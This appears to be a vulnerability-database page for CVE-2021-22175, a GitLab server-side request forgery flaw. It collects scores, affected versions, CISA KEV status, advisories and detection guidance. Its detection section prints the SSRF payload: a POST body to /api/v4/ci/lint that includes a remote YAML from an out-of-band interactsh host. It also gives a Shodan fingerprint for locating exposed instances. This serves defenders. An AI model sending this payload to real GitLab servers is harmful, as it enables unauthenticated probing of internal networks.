CVE-2021-22175
published 2021-06-11CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5…
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-03-11
Exploited in the wild
EPSS
53.37%
98.9th percentile
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | gitlab | < gitlab 15.10.8+ds1-2 (sid) | gitlab 15.10.8+ds1-2 (sid) |
| gitlab | gitlab | — | — |
| gitlab | gitlab | — | — |
| gitlab | gitlab | — | — |
| gitlab | gitlab | — | — |
| gitlab | gitlab | >= 10.5.0 < 13.6.7 | 13.6.7 |
| gitlab | gitlab | >= 13.7.0 < 13.7.7 | 13.7.7 |
| gitlab | gitlab | >= 13.8.0 < 13.8.4 | 13.8.4 |
Detection & IOCsextracted from sources · hover to see the quote
urlPOST /api/v4/ci/lint HTTP/1.1
path/api/v4/ci/lint
path/api/v4/ci/lint?include_merged_yaml=true
command{"include_merged_yaml":true,"content":"include:\n remote: 'http://{{interactsh-url}}/gitlab.yml'"}
- →Detect unauthenticated POST requests to /api/v4/ci/lint containing a 'remote:' key pointing to internal/loopback addresses in the JSON body — this is the SSRF trigger endpoint for CVE-2021-22175.
- →Match HTTP 200 responses from /api/v4/ci/lint with a JSON body containing 'does not have valid YAML syntax!' — this indicates the server attempted to fetch the remote URL (SSRF triggered).
- →Monitor for unauthenticated POST requests to /api/v4/ci/lint with Content-Type: application/json, especially where the body includes 'include_merged_yaml' and a 'remote:' directive targeting internal network addresses.
- →Use out-of-band (OAST/interactsh) detection: if the GitLab server initiates an outbound HTTP request to an attacker-controlled host after receiving a crafted /api/v4/ci/lint POST, SSRF is confirmed.
- →Shodan/FOFA fingerprint for exposed GitLab instances: http.title:"GitLab" — use to identify potentially vulnerable internet-facing instances.
- ·The SSRF vulnerability is only exploitable when 'requests to the internal network for webhooks' is enabled in GitLab instance settings. If this option is disabled, the attack surface is significantly reduced. ↗
- ·The vulnerability affects all GitLab CE/EE versions starting from 10.5. The Debian security tracker notes it was fixed in version 15.10.8+ds1-2 for the sid branch. ↗
- ·This CVE is part of a cluster of related SSRF vulnerabilities in GitLab fixed across separate patches; detections may also apply to CVE-2021-39935 and CVE-2021-22214 which share the same attack vector.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck6.8MEDIUM
cisa9.8CRITICAL
vendor_debian6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4gm2-v7j4-74p8: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting
ghsa_unreviewed·2022-05-24
CVE-2021-22175 [CRITICAL] CWE-918 GHSA-4gm2-v7j4-74p8: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled
OSV
CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting
osv·2021-06-11·CVSS 9.8
CVE-2021-22175 [CRITICAL] CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled
VulnCheck
GitLab Server-Side Request Forgery (SSRF) Vulnerability
vulncheck·2021·CVSS 6.8
CVE-2021-22175 [MEDIUM] CWE-918 GitLab Server-Side Request Forgery (SSRF) Vulnerability
GitLab Server-Side Request Forgery (SSRF) Vulnerability
GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled.
Affected: GitLab GitLab
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.greynoise.io/blog/new-ssrf-exploitation-surge; https://app.crowdsec.net/cti/cve-explorer/CVE-2021-22175; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2026-03-11
CISA
GitLab Server-Side Request Forgery (SSRF) Vulnerability
cisa·2026-02-18·CVSS 9.8
CVE-2021-22175 [CRITICAL] CWE-918 GitLab Server-Side Request Forgery (SSRF) Vulnerability
Vulnerability: GitLab Server-Side Request Forgery (SSRF) Vulnerability
Affected: GitLab GitLab
GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json ; https://nvd.nist.gov/vuln/detail/CVE-2021-22175
Remediation Due Date: 2026-03-11
GitLab
CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting
vendor_gitlab·2021-06-11·CVSS 6.8
CVE-2021-22175 [MEDIUM] CWE-918 CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting
CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled
CISA KEV: GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Debian
CVE-2021-22175: gitlab - When requests to the internal network for webhooks are enabled, a server-side re...
vendor_debian·2021·CVSS 6.8
CVE-2021-22175 [MEDIUM] CVE-2021-22175: gitlab - When requests to the internal network for webhooks are enabled, a server-side re...
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled
Scope: local
sid: resolved (fixed in 15.10.8+ds1-2)
No detection rules found.
Nuclei
Gitlab CE/EE 10.5 - Server-Side Request Forgery
nuclei·CVSS 9.8
CVE-2021-22214 [CRITICAL] Gitlab CE/EE 10.5 - Server-Side Request Forgery
Gitlab CE/EE 10.5 - Server-Side Request Forgery
GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
Template:
id: CVE-2021-22214
info:
name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
author: Suman_Kar,GitLab Red Team
severity: high
description: |
GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab i
Nuclei
GitLab CI Lint API - Server-Side Request Forgery
nuclei·CVSS 9.8
CVE-2021-22175 [CRITICAL] GitLab CI Lint API - Server-Side Request Forgery
GitLab CI Lint API - Server-Side Request Forgery
GitLab 10.5 and later contain a server-side request forgery caused by insecure handling of webhook requests, letting unauthenticated attackers exploit the server for arbitrary requests, exploit requires sending crafted webhook requests.
Template:
id: CVE-2021-22175
info:
name: GitLab CI Lint API - Server-Side Request Forgery
author: 0x_Akoko
severity: high
description: |
GitLab 10.5 and later contain a server-side request forgery caused by insecure handling of webhook requests, letting unauthenticated attackers exploit the server for arbitrary requests, exploit requires sending crafted webhook requests.
impact: |
Unauthenticated attackers can perform arbitrary requests on internal network, potentially leading to information disclosure or
https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.jsonhttps://gitlab.com/gitlab-org/gitlab/-/issues/294178https://hackerone.com/reports/1059596https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.jsonhttps://gitlab.com/gitlab-org/gitlab/-/issues/294178https://hackerone.com/reports/1059596https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22175
2021-06-11
Published
2026-02-18
Added to CISA KEV
Exploited in the wild